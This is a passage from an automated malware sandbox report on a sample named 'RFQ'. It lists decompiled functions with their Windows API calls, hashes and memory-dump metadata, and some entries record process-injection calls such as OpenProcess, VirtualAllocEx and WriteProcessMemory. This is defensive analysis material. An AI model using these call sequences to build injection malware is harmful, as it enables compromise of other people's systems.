                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006E0FA6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                            • String ID:
                                                                            • API String ID: 44706859-0
                                                                            • Opcode ID: 337a34c8e368b0162dd0d527eb4cdfa2cb9ffe773ed44fd64f35774bab063dba
                                                                            • Instruction ID: 9c4353bf77ed8a6aad53d6505941832e728c1991ee0db95c8c0c5c39ac1a58df
                                                                            • Opcode Fuzzy Hash: 337a34c8e368b0162dd0d527eb4cdfa2cb9ffe773ed44fd64f35774bab063dba
                                                                            • Instruction Fuzzy Hash: FAF04F75281315BBD7224FE9EC59F963B6EEF89760F218414F945C6290CA74DC508A60
                                                                            Function 006F022D Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CloseHandle.KERNEL32(?,?,?,?,006F009B,?,006F321A,?,00000001,006C311E,?), ref: 006F0242
                                                                            • CloseHandle.KERNEL32(?,?,?,?,006F009B,?,006F321A,?,00000001,006C311E,?), ref: 006F024F
                                                                            • CloseHandle.KERNEL32(?,?,?,?,006F009B,?,006F321A,?,00000001,006C311E,?), ref: 006F025C
                                                                            • CloseHandle.KERNEL32(?,?,?,?,006F009B,?,006F321A,?,00000001,006C311E,?), ref: 006F0269
                                                                            • CloseHandle.KERNEL32(?,?,?,?,006F009B,?,006F321A,?,00000001,006C311E,?), ref: 006F0276
                                                                            • CloseHandle.KERNEL32(?,?,?,?,006F009B,?,006F321A,?,00000001,006C311E,?), ref: 006F0283
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: 00e2c8a30d7ac508fea3426cca8103658ce74b10c0437c4ba0ebace5a95064b4
                                                                            • Instruction ID: 9d81dae2088d8f810f7711e8465e8d6b3ef06c6196b5e049ed503820e83a94ba
                                                                            • Opcode Fuzzy Hash: 00e2c8a30d7ac508fea3426cca8103658ce74b10c0437c4ba0ebace5a95064b4
                                                                            • Instruction Fuzzy Hash: 8501C475800B19DFDB319F66D880466F7F6BF503153158A3FD29651A32C3B0AA48CF90
                                                                            Function 006BD6DA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _free.LIBCMT ref: 006BD6F2
                                                                              • Part of subcall function 006B2958: RtlFreeHeap.NTDLL(00000000,00000000,?,006BD771,00000000,00000000,00000000,00000000,?,006BD798,00000000,00000007,00000000,?,006BDB95,00000000), ref: 006B296E
                                                                              • Part of subcall function 006B2958: GetLastError.KERNEL32(00000000,?,006BD771,00000000,00000000,00000000,00000000,?,006BD798,00000000,00000007,00000000,?,006BDB95,00000000,00000000), ref: 006B2980
                                                                            • _free.LIBCMT ref: 006BD704
                                                                            • _free.LIBCMT ref: 006BD716
                                                                            • _free.LIBCMT ref: 006BD728
                                                                            • _free.LIBCMT ref: 006BD73A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0
                                                                            • Opcode ID: 1a07578fb91eab480e69cd92b0e3952dcd3983c166168af3cb39cbf84584aabb
                                                                            • Instruction ID: e87a93168fbbd929ca68d0ea2f2ebd88281217edc8e91868c50b9b1a9bd85696
                                                                            • Opcode Fuzzy Hash: 1a07578fb91eab480e69cd92b0e3952dcd3983c166168af3cb39cbf84584aabb
                                                                            • Instruction Fuzzy Hash: 1EF04FB660134AAB86A1EB55E8C9CD673DFBB45311B954C1AF14CDB601DB34FCC04B58
                                                                            Function 006E5B9A Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 006E5BAE
                                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 006E5BC5
                                                                            • MessageBeep.USER32(00000000), ref: 006E5BDD
                                                                            • KillTimer.USER32(?,0000040A), ref: 006E5BF9
                                                                            • EndDialog.USER32(?,00000001), ref: 006E5C13
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                            • String ID:
                                                                            • API String ID: 3741023627-0
                                                                            • Opcode ID: fe809424b9acc95a1c6b1151238b321a2db9b2c98bab3a6f78a2684b9641137d
                                                                            • Instruction ID: 1fec825945c00350b8d3fde1e2900ba9e1af27a0a1889ac5376e5ba0992fc54b
                                                                            • Opcode Fuzzy Hash: fe809424b9acc95a1c6b1151238b321a2db9b2c98bab3a6f78a2684b9641137d
                                                                            • Instruction Fuzzy Hash: CE01F430540704ABEB325B54DD5EFD677B9BF00B09F04855DB183A10E1DBF4A988CB84
                                                                            Function 006B2230 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _free.LIBCMT ref: 006B224E
                                                                              • Part of subcall function 006B2958: RtlFreeHeap.NTDLL(00000000,00000000,?,006BD771,00000000,00000000,00000000,00000000,?,006BD798,00000000,00000007,00000000,?,006BDB95,00000000), ref: 006B296E
                                                                              • Part of subcall function 006B2958: GetLastError.KERNEL32(00000000,?,006BD771,00000000,00000000,00000000,00000000,?,006BD798,00000000,00000007,00000000,?,006BDB95,00000000,00000000), ref: 006B2980
                                                                            • _free.LIBCMT ref: 006B2260
                                                                            • _free.LIBCMT ref: 006B2273
                                                                            • _free.LIBCMT ref: 006B2284
                                                                            • _free.LIBCMT ref: 006B2295
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0
                                                                            • Opcode ID: 9340935fae051f52d3ef195bd73e1ae03f3374be7225f6236fcded1dffa2ecd9
                                                                            • Instruction ID: b6d3a2651478e532be431d27de3f9deb77655961200bba6c74a03aefffb95adc
                                                                            • Opcode Fuzzy Hash: 9340935fae051f52d3ef195bd73e1ae03f3374be7225f6236fcded1dffa2ecd9
                                                                            • Instruction Fuzzy Hash: E4F030B46013128B8692BF55AC129C837A6B719753B41CA0FF618D22B5C77C05D39BCD
                                                                            Function 0069AA4B Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EndPath.GDI32(?), ref: 0069AA5A
                                                                            • StrokeAndFillPath.GDI32(?,?,006D7BB4,00000000,?,?,?), ref: 0069AA76
                                                                            • SelectObject.GDI32(?,00000000), ref: 0069AA89
                                                                            • DeleteObject.GDI32 ref: 0069AA9C
                                                                            • StrokePath.GDI32(?), ref: 0069AAB7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                            • String ID:
                                                                            • API String ID: 2625713937-0
                                                                            • Opcode ID: 05a3c40fb9eaa45747d03459a57ae5f921b691e384469abb6177a14d918577b4
                                                                            • Instruction ID: c1f9140bdddd1f2105347e79422d613a88d70dcafbe2979dcb3d688c15006c41
                                                                            • Opcode Fuzzy Hash: 05a3c40fb9eaa45747d03459a57ae5f921b691e384469abb6177a14d918577b4
                                                                            • Instruction Fuzzy Hash: 6AF01930041388EBDB129FA8ED187E43BA6AB04323F44C214F465551F0C77C9991DFA9
                                                                            Function 006B0ED7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: __freea$_free
                                                                            • String ID: a/p$am/pm
                                                                            • API String ID: 3432400110-3206640213
                                                                            • Opcode ID: 37d6edd8d79a9732af58cc2ae50509970d11548a1fca72dbe26d674ead2d322a
                                                                            • Instruction ID: 70bfa0c8d3cdaf3d350b87352cc4fc2a214b39f1a765a5ed643080bc7ac9762d
                                                                            • Opcode Fuzzy Hash: 37d6edd8d79a9732af58cc2ae50509970d11548a1fca72dbe26d674ead2d322a
                                                                            • Instruction Fuzzy Hash: 1FD1E2B1A10205EADB249FA8C8657FAB7B3EF07300FA44159E9019F751E7359EC1CB90
                                                                            Function 007060F7 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 006A01C2: EnterCriticalSection.KERNEL32(0075070C,?,?,?,00691744,00752580,?,?,?), ref: 006A01CD
                                                                              • Part of subcall function 006A01C2: LeaveCriticalSection.KERNEL32(0075070C,?,00691744,00752580,?,?,?), ref: 006A020A
                                                                              • Part of subcall function 006A0023: __onexit.LIBCMT ref: 006A0029
                                                                            • __Init_thread_footer.LIBCMT ref: 0070615F
                                                                              • Part of subcall function 006A0178: EnterCriticalSection.KERNEL32(0075070C,?,?,006D556E,00752540,?,?,?,?,?), ref: 006A0182
                                                                              • Part of subcall function 006A0178: LeaveCriticalSection.KERNEL32(0075070C,?,006D556E,00752540,?,?,?,?,?), ref: 006A01B5
                                                                              • Part of subcall function 006F34BA: LoadStringW.USER32(00000066,?,00000FFF,?), ref: 006F3502
                                                                              • Part of subcall function 006F34BA: LoadStringW.USER32(?,?,00000FFF,?), ref: 006F3528
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                                                            • String ID: x#u$x#u$x#u
                                                                            • API String ID: 1072379062-3372033415
                                                                            • Opcode ID: 0be253005de528a901065ebb45ea9c01e214a058db893507895b29de9d8ea86f
                                                                            • Instruction ID: 88b9c6ce2b4dbf9d35d666c27cfaa2689c96d5de00af01866e9dc563320d0d57
                                                                            • Opcode Fuzzy Hash: 0be253005de528a901065ebb45ea9c01e214a058db893507895b29de9d8ea86f
                                                                            • Instruction Fuzzy Hash: 92C17C71A00109EFCB10EF58C8A1EAEB7FAEF45310F108129F9459B291D778EE55CB90
                                                                            Function 007095BB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 313memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharLowerBuffW.USER32(?,?), ref: 0070963F
                                                                            • CharLowerBuffW.USER32(?,?), ref: 00709682
                                                                            • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040,00000000,?,?), ref: 00709895
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharLower$AllocVirtual
                                                                            • String ID: un
                                                                            • API String ID: 3213863441-4255045500
                                                                            • Opcode ID: 7c4a25d7564a65a840f438556d1f7f9b0511823be0192af5a8c518a2b71b7dd4
                                                                            • Instruction ID: de3f8a95213be602a249e4857ca71c391ff076a91bfae70d00a5fff0d035e283
                                                                            • Opcode Fuzzy Hash: 7c4a25d7564a65a840f438556d1f7f9b0511823be0192af5a8c518a2b71b7dd4
                                                                            • Instruction Fuzzy Hash: C3D15771604300CFC744DF28C48495ABBE5EF89314F198A6DE9899B3A2DB75ED46CF82
                                                                            Function 00684DF1 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 262COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen
                                                                            • String ID: 3$A$_
                                                                            • API String ID: 176396367-1956071190
                                                                            • Opcode ID: 6272c004857010e7c0254dedc24fa665309ff05f8fd52022e17da514710bb9c0
                                                                            • Instruction ID: 24e68d65b6110234edd7d4507cdb429effe25ecd49026ab052e82e648d8c632c
                                                                            • Opcode Fuzzy Hash: 6272c004857010e7c0254dedc24fa665309ff05f8fd52022e17da514710bb9c0
                                                                            • Instruction Fuzzy Hash: 2081F431A002129ACF24BF58C485BBDB7A3FF94710F24875EE9929B3D0DB759A81C794
                                                                            Function 0070479E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 248COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0068B606: _wcslen.LIBCMT ref: 0068B610
                                                                              • Part of subcall function 006DF934: VariantClear.OLEAUT32(?), ref: 006DF950
                                                                              • Part of subcall function 006DF934: VariantCopy.OLEAUT32(?,00000000), ref: 006DF958
                                                                              • Part of subcall function 006DF934: VariantClear.OLEAUT32(?), ref: 006DF963
                                                                            • GetLastError.KERNEL32(?,00000000,?,?,00000035,?), ref: 007048E3
                                                                            • VariantInit.OLEAUT32(?), ref: 007049D8
                                                                            • VariantClear.OLEAUT32(?), ref: 00704A97
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$Clear$CopyErrorInitLast_wcslen
                                                                            • String ID: Qdn
                                                                            • API String ID: 3379188476-967081833
                                                                            • Opcode ID: 475e6081f0349e7593317ceacb969894d5576526df1f1169a2f6ddbc35b3d4a5
                                                                            • Instruction ID: a67a02cf7fbed19b3037d9c5d7f0ab2bdc64e4c8c49233992cf2b73bd4b9fa29
                                                                            • Opcode Fuzzy Hash: 475e6081f0349e7593317ceacb969894d5576526df1f1169a2f6ddbc35b3d4a5
                                                                            • Instruction Fuzzy Hash: 86B13EB1900249EFCB44EFD4C891AEDBBB9FF04304F14812EE516AB291DB75A986CF54
                                                                            Function 0068D4E0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 232COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __Init_thread_footer.LIBCMT ref: 0068D7B3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Init_thread_footer
                                                                            • String ID: D%u$D%u$D%u
                                                                            • API String ID: 1385522511-622992210
                                                                            • Opcode ID: d0534d90ffd79b3da33d59239e679d669a9c510787f88374914976e425d26500
                                                                            • Instruction ID: 510eb1f8f05d3ce579bea7fc433c49900f7592696e96312200ff51cb79609271
                                                                            • Opcode Fuzzy Hash: d0534d90ffd79b3da33d59239e679d669a9c510787f88374914976e425d26500
                                                                            • Instruction Fuzzy Hash: 19913B75A00206DFCB18DF58C090AAAB7F2FF59314F24826AD94597391E771ED82CFA1
                                                                            Function 00707698 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 189COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(ybm,00000000,?,0071D0D0,?,00000000,00000000), ref: 00707804
                                                                              • Part of subcall function 006884E7: _wcslen.LIBCMT ref: 006884FA
                                                                            • CharUpperBuffW.USER32(ybm,00000000,?,0071D0D0,00000000,?,00000000,00000000), ref: 00707762
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpper$_wcslen
                                                                            • String ID: Lst$ybm
                                                                            • API String ID: 3544283678-2409334373
                                                                            • Opcode ID: 57ea22b4acb455d9f71d70d5ae4469cd255ecd9542e45e256548c797d8851d62
                                                                            • Instruction ID: eeec1fe33a045f3b9892fa8e183892864e9d511a0d8b32eb9100bc2e5df631be
                                                                            • Opcode Fuzzy Hash: 57ea22b4acb455d9f71d70d5ae4469cd255ecd9542e45e256548c797d8851d62
                                                                            • Instruction Fuzzy Hash: 4D613C72D14119EACF48FBE4CC95DFDB3B9BF18300B445229E542670D1EF68AA09CBA4
                                                                            Function 0070566C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 125COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpper_wcslen
                                                                            • String ID: CALLARGARRAY$Qdn
                                                                            • API String ID: 157775604-1360434663
                                                                            • Opcode ID: 5e974cd69cf81811940340df48ec8951237baa8aa74f42038917b2ebb9386c1e
                                                                            • Instruction ID: cad993dfc270dece6f4cec1484d3a233c13cabd7d95fdec94576d3c4aead35c4
                                                                            • Opcode Fuzzy Hash: 5e974cd69cf81811940340df48ec8951237baa8aa74f42038917b2ebb9386c1e
                                                                            • Instruction Fuzzy Hash: B2418071A00205DFCF14EFA9C8858AEBBF6EF59320F10522DE405A7291EB799D81DF90
                                                                            Function 006E265A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 006EB321: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006E2114,?,?,00000034,00000800,?,00000034), ref: 006EB34B
                                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 006E26A4
                                                                              • Part of subcall function 006EB2EC: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006E2143,?,?,00000800,?,00001073,00000000,?,?), ref: 006EB316
                                                                              • Part of subcall function 006EB248: GetWindowThreadProcessId.USER32(?,?), ref: 006EB273
                                                                              • Part of subcall function 006EB248: OpenProcess.KERNEL32(00000438,00000000,?,?,?,006E20D8,00000034,?,?,00001004,00000000,00000000), ref: 006EB283
                                                                              • Part of subcall function 006EB248: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,006E20D8,00000034,?,?,00001004,00000000,00000000), ref: 006EB299
                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 006E2711
                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 006E275E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                            • String ID: @
                                                                            • API String ID: 4150878124-2766056989
                                                                            • Opcode ID: 91ad7a0a84b02429a5f59cf53350fa501c72ca12bf8d952331a0c7e26530a59b
